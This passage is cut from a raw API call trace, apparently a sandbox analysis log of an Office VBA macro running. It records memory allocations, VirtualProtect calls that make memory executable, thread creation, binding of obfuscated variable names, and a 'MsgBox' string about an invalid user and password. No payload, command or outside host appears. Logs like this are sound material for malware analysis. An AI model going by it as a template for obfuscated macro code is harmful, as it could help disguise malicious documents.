(This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.502] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.502] GetCurrentProcess () returned 0xffffffffffffffff [0157.502] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x45) returned 1 [0157.502] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.502] _mbscpy_s (in: _Dst=0x1dd510, _DstSizeInBytes=0xc, _Src=0x5732e96 | out: _Dst=0x1dd510) returned 0x0 [0157.502] IMalloc:Alloc (This=0x7fefecb5380, cb=0x68) returned 0xa12b350 [0157.502] strcpy_s (in: _Dst=0x9c54d60, _DstSize=0xc, _Src="xoAOvMNPSVo" | out: _Dst="xoAOvMNPSVo") returned 0x0 [0157.502] strcpy_s (in: _Dst=0x980aad8, _DstSize=0x3, _Src="yy" | out: _Dst="yy") returned 0x0 [0157.503] strcpy_s (in: _Dst=0x980aae8, _DstSize=0x4, _Src="msg" | out: _Dst="msg") returned 0x0 [0157.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] GetCurrentProcess () returned 0xffffffffffffffff [0157.503] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x5d) returned 1 [0157.503] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c54ee0 [0157.503] _mbscpy_s (in: _Dst=0x1dd510, _DstSizeInBytes=0xc, _Src=0x5732f0a | out: _Dst=0x1dd510) returned 0x0 [0157.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0x60) returned 0xa12b4a0 [0157.503] strcpy_s (in: _Dst=0x9c54d78, _DstSize=0xc, _Src="hMqirSfTAmm" | out: _Dst="hMqirSfTAmm") returned 0x0 [0157.503] strcpy_s (in: _Dst=0x980aaf8, _DstSize=0x3, _Src="ss" | out: _Dst="ss") returned 0x0 [0157.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.503] GetCurrentProcess () returned 0xffffffffffffffff [0157.503] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x55) returned 1 [0157.503] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0x14) returned 0x96547f0 [0157.504] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99e1220 [0157.504] IMalloc:Free (This=0x7fefecb5380, pv=0x96547f0) [0157.504] free (_Block=0x0) [0157.504] free (_Block=0x0) [0157.504] free (_Block=0x0) [0157.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x12) returned 0x96547f0 [0157.504] IMalloc:Free (This=0x7fefecb5380, pv=0x96547f0) [0157.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x58) returned 0x95a2910 [0157.504] GetCurrentProcess () returned 0xffffffffffffffff [0157.504] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0157.504] GetCurrentProcess () returned 0xffffffffffffffff [0157.504] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0157.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x96547f0 [0157.504] IMalloc:Free (This=0x7fefecb5380, pv=0x96547f0) [0157.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x58) returned 0x95a28b0 [0157.504] GetCurrentProcess () returned 0xffffffffffffffff [0157.504] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0157.504] GetCurrentProcess () returned 0xffffffffffffffff [0157.504] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0157.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x13) returned 0x96547f0 [0157.504] IMalloc:Free (This=0x7fefecb5380, pv=0x96547f0) [0157.504] IMalloc:Alloc (This=0x7fefecb5380, cb=0x58) returned 0x95a2850 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0157.505] IMalloc:Alloc (This=0x7fefecb5380, cb=0x12) returned 0x96547f0 [0157.505] IMalloc:Free (This=0x7fefecb5380, pv=0x96547f0) [0157.505] IMalloc:Alloc (This=0x7fefecb5380, cb=0x58) returned 0x95bce90 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55268, dwSize=0x2) returned 1 [0157.505] GetCurrentProcess () returned 0xffffffffffffffff [0157.505] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c552bc, dwSize=0x55) returned 1 [0157.505] VirtualProtect (in: lpAddress=0x9c552bc, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1de58c | out: lpflOldProtect=0x1de58c*=0x4) returned 1 [0157.506] GetCurrentProcess () returned 0xffffffffffffffff [0157.506] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0157.506] GetCurrentProcess () returned 0xffffffffffffffff [0157.506] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0157.506] GetCurrentProcess () returned 0xffffffffffffffff [0157.506] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553d0, dwSize=0x2) returned 1 [0157.506] GetCurrentProcess () returned 0xffffffffffffffff [0157.506] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55424, dwSize=0x45) returned 1 [0157.506] VirtualProtect (in: lpAddress=0x9c55424, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1de58c | out: lpflOldProtect=0x1de58c*=0x40) returned 1 [0157.507] GetCurrentProcess () returned 0xffffffffffffffff [0157.507] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c554ac, dwSize=0x45) returned 1 [0157.507] VirtualProtect (in: lpAddress=0x9c554ac, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1de58c | out: lpflOldProtect=0x1de58c*=0x40) returned 1 [0157.508] GetCurrentProcess () returned 0xffffffffffffffff [0157.508] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0157.508] GetCurrentProcess () returned 0xffffffffffffffff [0157.508] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0157.508] GetCurrentProcess () returned 0xffffffffffffffff [0157.508] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55538, dwSize=0x2) returned 1 [0157.508] GetCurrentProcess () returned 0xffffffffffffffff [0157.508] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54f30, dwSize=0x5d) returned 1 [0157.508] VirtualProtect (in: lpAddress=0x9c54f30, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1de58c | out: lpflOldProtect=0x1de58c*=0x4) returned 1 [0157.509] GetCurrentProcess () returned 0xffffffffffffffff [0157.509] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0157.509] GetCurrentProcess () returned 0xffffffffffffffff [0157.509] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0157.509] GetCurrentProcess () returned 0xffffffffffffffff [0157.509] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fd0, dwSize=0x2) returned 1 [0157.509] GetCurrentProcess () returned 0xffffffffffffffff [0157.509] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55024, dwSize=0x55) returned 1 [0157.509] VirtualProtect (in: lpAddress=0x9c55024, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1de58c | out: lpflOldProtect=0x1de58c*=0x40) returned 1 [0157.510] free (_Block=0x0) [0157.510] free (_Block=0x0) [0157.510] free (_Block=0x0) [0157.510] IMalloc:Alloc (This=0x7fefecb5380, cb=0x8) returned 0xa2675f0 [0157.510] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa2675f0) returned 0x8 [0157.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0x78) returned 0xa211e80 [0157.511] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa211e80) returned 0x78 [0157.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0157.511] IMalloc:Alloc (This=0x7fefecb5380, cb=0x40) returned 0xa222f50 [0157.511] DispCallFunc (pvInstance=0xa211ee0, oVft=0x38, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x1de4f0) returned 0x0 [0157.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fee4e21778, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1ddfb0 | out: lpThreadId=0x1ddfb0*=0x5a8) returned 0xf10 [0157.529] PeekMessageA (in: lpMsg=0x1ddf50, hWnd=0x20228, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x1ddf50) returned 0 [0157.529] GetActiveWindow () returned 0x2039c [0157.531] IMalloc:Alloc (This=0x7fefecb5380, cb=0x810) returned 0x9aa5300 [0157.531] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x30) returned 0x9ff4110 [0157.531] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6700000 [0157.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ec1c, cbMultiByte=12, lpWideCharStr=0x67000dc, cchWideChar=26 | out: lpWideCharStr="qnZeVsoOpmeN") returned 12 [0157.532] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99e1670 [0157.532] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x200) returned 0xa19f3d0 [0157.532] realloc (_Block=0x0, _Size=0x200) returned 0x48aaa90 [0157.533] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9ff40d0 [0157.533] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7f91150, cb=0xa0) returned 0x97791b0 [0157.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732cc2, cbMultiByte=5, lpWideCharStr=0x1dc6f0, cchWideChar=6 | out: lpWideCharStr="mykk") returned 5 [0157.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732cc2, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="mykk") returned 5 [0157.533] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="mykk", lHashVal=0x1097c3, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732cc2, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="mykk") returned 5 [0157.533] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="mykk", lHashVal=0x1097c3, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732cc2, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="mykk") returned 5 [0157.534] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="mykk", lHashVal=0x1097c3, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732cc2, cbMultiByte=5, lpWideCharStr=0x1dc730, cchWideChar=6 | out: lpWideCharStr="mykk") returned 5 [0157.534] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="mykk", lHashVal=0x1097c3, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.534] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c8fe20, cb=0x100) returned 0xa1cacd0 [0157.534] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc) returned 0xa2b5e50 [0157.534] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x5, _Src=0x5732cc2 | out: _Dst=0xa2b5e50) returned 0x0 [0157.536] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mykk") returned 0x10fd2f [0157.536] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xc, _Src="_B_var_mykk" | out: _Dst="_B_var_mykk") returned 0x0 [0157.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=12, lpWideCharStr=0x1dc690, cchWideChar=12 | out: lpWideCharStr="_B_var_mykk") returned 12 [0157.537] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.537] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_mykk", lHashVal=0x10fd2f, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.537] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.537] IUnknown:AddRef (This=0x9ab4b50) returned 0x14 [0157.537] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_mykk", lHashVal=0x10fd2f, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.537] IUnknown:Release (This=0x9ab4b50) returned 0x13 [0157.537] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.537] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_mykk", lHashVal=0x10fd2f, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.537] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.537] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.537] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_mykk", lHashVal=0x10fd2f, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.537] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.537] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.537] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a05b6, cbMultiByte=12, lpWideCharStr=0x1dc6f0, cchWideChar=13 | out: lpWideCharStr="_B_var_mykk") returned 12 [0157.537] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_mykk", lHashVal=0x10fd2f, wFlags=0x5, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6b00000000, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6b00000000, pDummy=0x0) returned 0x0 [0157.537] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x5, _Src=0x5732cc2 | out: _Dst=0x1dc8b0) returned 0x0 [0157.538] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.541] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x2, _Src=0x5732cea | out: _Dst=0x1dcb50) returned 0x0 [0157.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ec3c, cbMultiByte=37, lpWideCharStr=0x670032a, cchWideChar=76 | out: lpWideCharStr="MsgBox ('Invalid User and Passwdord')") returned 37 [0157.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d0e, cbMultiByte=2, lpWideCharStr=0x1dc6f0, cchWideChar=3 | out: lpWideCharStr="d") returned 2 [0157.542] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1cacd0, cb=0x200) returned 0xa19eda0 [0157.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d0e, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="d") returned 2 [0157.542] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="d", lHashVal=0x10105b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d0e, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="d") returned 2 [0157.542] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="d", lHashVal=0x10105b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d0e, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="d") returned 2 [0157.542] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="d", lHashVal=0x10105b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d0e, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="d") returned 2 [0157.542] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="d", lHashVal=0x10105b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.542] IMalloc:Alloc (This=0x7fefecb5380, cb=0x9) returned 0xa2b5e50 [0157.542] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x2, _Src=0x5732d0e | out: _Dst=0xa2b5e50) returned 0x0 [0157.542] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_d") returned 0x10a204 [0157.542] strcpy_s (in: _Dst=0x1dc840, _DstSize=0x9, _Src="_B_var_d" | out: _Dst="_B_var_d") returned 0x0 [0157.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=9, lpWideCharStr=0x1dc690, cchWideChar=9 | out: lpWideCharStr="_B_var_d") returned 9 [0157.543] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.543] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_d", lHashVal=0x10a204, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.543] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.543] IUnknown:AddRef (This=0x9ab4b50) returned 0x14 [0157.543] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_d", lHashVal=0x10a204, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.543] IUnknown:Release (This=0x9ab4b50) returned 0x13 [0157.543] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.543] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_d", lHashVal=0x10a204, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.543] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.543] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.543] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_d", lHashVal=0x10a204, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.543] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.543] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.543] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a05e2, cbMultiByte=9, lpWideCharStr=0x1dc6f0, cchWideChar=10 | out: lpWideCharStr="_B_var_d") returned 9 [0157.543] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_d", lHashVal=0x10a204, wFlags=0x5, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x64005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x64005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.543] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x2, _Src=0x5732d0e | out: _Dst=0x1dc8b0) returned 0x0 [0157.543] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.543] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x3, _Src=0x5732d32 | out: _Dst=0x1dcb50) returned 0x0 [0157.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bfe, cbMultiByte=2, lpWideCharStr=0x1dc6f0, cchWideChar=3 | out: lpWideCharStr="i") returned 2 [0157.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bfe, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="i") returned 2 [0157.544] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="i", lHashVal=0x101060, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bfe, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="i") returned 2 [0157.544] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="i", lHashVal=0x101060, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bfe, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="i") returned 2 [0157.544] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="i", lHashVal=0x101060, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732bfe, cbMultiByte=2, lpWideCharStr=0x1dc730, cchWideChar=3 | out: lpWideCharStr="i") returned 2 [0157.544] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="i", lHashVal=0x101060, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.544] IMalloc:Alloc (This=0x7fefecb5380, cb=0x9) returned 0xa2b5e50 [0157.544] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x2, _Src=0x5732bfe | out: _Dst=0xa2b5e50) returned 0x0 [0157.544] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_i") returned 0x10a209 [0157.544] strcpy_s (in: _Dst=0x1dc840, _DstSize=0x9, _Src="_B_var_i" | out: _Dst="_B_var_i") returned 0x0 [0157.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=9, lpWideCharStr=0x1dc690, cchWideChar=9 | out: 